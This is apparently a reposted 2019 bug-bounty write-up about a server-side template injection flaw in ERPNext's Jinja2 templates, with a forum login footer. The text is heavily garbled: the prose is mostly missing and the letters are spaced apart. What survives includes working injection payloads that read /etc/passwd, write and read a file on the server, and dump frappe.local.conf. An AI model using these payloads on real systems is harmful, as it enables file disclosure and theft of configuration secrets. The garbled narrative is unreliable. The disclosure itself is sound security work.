[13838] 2019-03-07_价值1250美元的ERPNext模版注入漏洞

文档创建者:s7ckTeam
浏览次数:17
最后更新:2025-01-18
2019-03-07_价值1250美元的ERPNext模版注入漏洞 1 2 5 0 E R P N e x t s e c i s t   F r e e B u f   2 0 1 9 - 0 3 - 0 7 w e b E R P N e x t F r a p p é T e c h n o l o g i e s P v t E R P N e x t W e b   f i r s t   n a m e { { 7 7 } } l a s t   n a m e { { 8 8 } } 4 9 6 4 使 P o r t s w i g g e r h t t p s : / / p o r t s w i g g e r . n e t / b l o g / s e r v e r - s i d e - t e m p l a t e - i n j e c t i o n J a m e s   K e t t l e J i n j a 2 使 P o r t s w i g g e r h t t p s : / / p o r t s w i g g e r . n e t / b l o g / s e r v e r - s i d e - t e m p l a t e - i n j e c t i o n 使 J i n j a 2 f i r s t   n a m e { {   ' ' . _ _ c l a s s _ _ . _ _ m r o _ _ [ 2 ] . _ _ s u b c l a s s e s _ _ ( ) [ 4 0 ] ( ' / e t c / p a s s w d ' ) . r e a d ( )   } }
W e b f i r s t   n a m e f i r s t   n a m e S S H   R S A { {   ' ' . _ _ c l a s s _ _ . _ _ m r o _ _ [ 2 ] . _ _ s u b c l a s s e s _ _ ( ) [ 4 0 ] ( ' / h o m e / f r a p p e / P o C . t x t ' ,   ' w ' ) . w r i t e ( '   P r o o f   o f   C o n c e p t :   b r i a n @ h y d e . s o l u t i o n s ' )   } } { {   ' ' . _ _ c l a s s _ _ . _ _ m r o _ _ [ 2 ] . _ _ s u b c l a s s e s _ _ ( ) [ 4 0 ] ( ' / h o m e / f r a p p e / P o C . t x t ' ) . r e a d ( )   } }
F r a p p é . _ _ { { 7 * 7 } } 4 9 F r a p p é G i t h u b E R P N e x t f i r s t l a s t   n a m e E R P N e x t 1 2 5 0 F r a p p é C V E S S T I X S S S Q L S S T I { {   f r a p p e . l o c a l . c o n f   } }
C V E F r a p p é   T e c h n o l o g i e s   P v t E R P N e x t F r a p p e * m e d i u m F B s e c i s t F r e e B u f . C O M
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则